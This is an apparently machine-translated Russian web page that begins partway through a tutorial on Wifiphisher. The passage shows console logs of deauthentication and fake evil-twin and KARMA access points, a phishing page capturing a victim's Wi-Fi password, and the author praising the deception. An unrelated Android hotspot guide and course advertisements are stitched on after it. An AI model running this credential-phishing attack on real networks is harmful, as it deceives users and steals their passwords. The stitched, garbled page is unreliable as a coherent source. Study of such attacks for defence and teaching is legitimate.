После того, как цель присоединится, всплывающее окно потребует ввести пароль.

Когда цель вводит пароль, мы уведомляемся на экране Wifiphisher.

  Канал расширений: DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ Жертва █████████████████ проверила WLAN с помощью ESSID: 'FakeNed' (KARMA) Жертва █████████████████ проверила WLAN с помощью ESSID: «Хармонд Фернандес» (Злой близнец) Связанные жертвы: ██████████████████ 10.0.0.13 Apple iOS / MacOS ██████████████████ 10.0.0.29 Murata Manufacturing HTTPS-запросы: [*] Запрос GET от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] POST-запрос из 10.0.0.13 с wfphshr-wpa-password = myfatpassword [*] Запрос GET от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html  

Вот и все! Скрипт завершится и представит вам только что введенный пароль.

  [*] Запуск Wifiphisher 1.4GIT (https://wifiphisher.org) в 2020-02-04 08:10 [+] Обнаружен часовой пояс. Установка диапазона каналов от 1 до 13 [+] Выбор интерфейса wfphshr-wlan0 для атаки деаутентификации [+] Выбор интерфейса wlan1 для создания мошеннической точки доступа [+] Изменение MAC-адреса wlan1 (BSSID) на 00: 00: 00: 31: 8c: e5 [!] Не удалось установить MAC-адрес. (Пробовал 00: 00: 00: ee: 5c: 95) [+] Отправка SIGKILL на wpa_supplicant [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL в NetworkManager [*] Убрал аренду, запустил DHCP, настроил iptables [+] Выбор шаблона страницы обновления прошивки [*] Запуск фейковой точки доступа... [*] Запуск HTTP / HTTPS-сервера на портах 8080, 443 [+] Покажи свою поддержку! [+] Подписывайтесь на нас: https://twitter.com/wifiphisher [+] Ставьте нам лайки: https://www.facebook.com/Wifiphisher [+] Полученные учетные данные: wfphshr-wpa-password = myfatpassword [!] Закрытие  

Вот так, вы обошли любую защиту паролем и обманом заставили пользователя ввести пароль Wi-Fi в вашу поддельную сеть. Хуже того, они все еще застряли за этим ужасным медленным фальшивым экраном загрузки.

Если вы ищете дешевую удобную платформу для начала работы с Wifipfisher, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием недорогой Raspberry Pi.

Изображение Kody / Null Byte

Надеюсь, вам понравилось это руководство по атакам социальной инженерии с использованием Wifiphisher! Если у вас есть какие-либо вопросы об этом руководстве по захвату паролей Wi-Fi или у вас есть комментарий, сделайте это ниже и не стесняйтесь обращаться ко мне в Twitter @KodyKinzie.

Начните взламывать сегодня: настройте безголовую платформу для взлома Raspberry Pi под управлением Kali Linux

Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою профессиональную хакерскую карьеру с помощью нашего комплекта обучения премиум-сертификату по этическому хакерству 2020 года в новом магазине Null Byte и получите более 60 часов обучения от профессионалов в области этического хакерства.

Купить сейчас (90% скидка)>

Изображение на обложке Джастина Мейерса / Gadget Hacks; Скриншоты Kody / Null Byte .

Как сделать из ASUS FonePad WI-FI роутер ?, как на

Если у вас есть Интернет на вашем мобильном устройстве, и вы хотите поделиться им с другими устройствами (например, вашим компьютером) - есть очень быстрый и простой способ сделать это. Следуйте приведенным ниже инструкциям, чтобы узнать, как сделать маршрутизатор WI-FI из вашего устройства Android.

  1. Первым делом включите на своем устройстве мобильный Интернет .
  2. Затем перейдите в Settings и в Connections найдите « Tethering and Mobile Hotspot ».
  3. Нажмите на Mobile Hotspot и сдвиньте, чтобы включить.

  4. Щелкнув меню опций, вы можете выбрать « Настроить точку доступа », где вы можете установить имя и пароль для вашего WI-FI маршрутизатора, который будет требоваться каждый раз, когда другие устройства будут пытаться подключиться к вашей сети. Мы рекомендуем выбрать надежный пароль и не сообщать его многим людям, так как, взломав ваш мобильный Интернет, нежелательные лица получат доступ ко всем вашим личным данным.

Если вы нашли это полезным, нажмите на звездочку Google, поставьте лайк Facebook или подписывайтесь на нас на Twitter и Instagram

.

Смотрите также



Компьютерные курсы по направлениям:

Для начинающих


A

Компьютер для начинающих: Word, Excel, Access и другие программы!

Графические пакеты


B

Популярные пакеты Adobe Photoshop, CorelDraw, ArchiCAD, AutoCAD и другие!

WEB + анимация


C

Курсы по созданию сайтов, WEB-дизайну и крутой анимации в Adobe Flash!

Бухгалтерия + делопроизводство

Сетевые технологии


E

Курсы сборки ПК, системных администраторов и защиты информации!